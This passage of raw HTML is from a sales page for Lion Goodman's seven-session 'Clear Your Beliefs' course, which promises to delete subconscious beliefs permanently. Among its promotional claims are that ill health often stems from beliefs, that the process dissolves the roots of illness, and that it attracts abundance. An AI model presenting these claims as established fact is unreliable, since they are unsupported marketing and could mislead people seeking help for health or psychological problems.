thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love 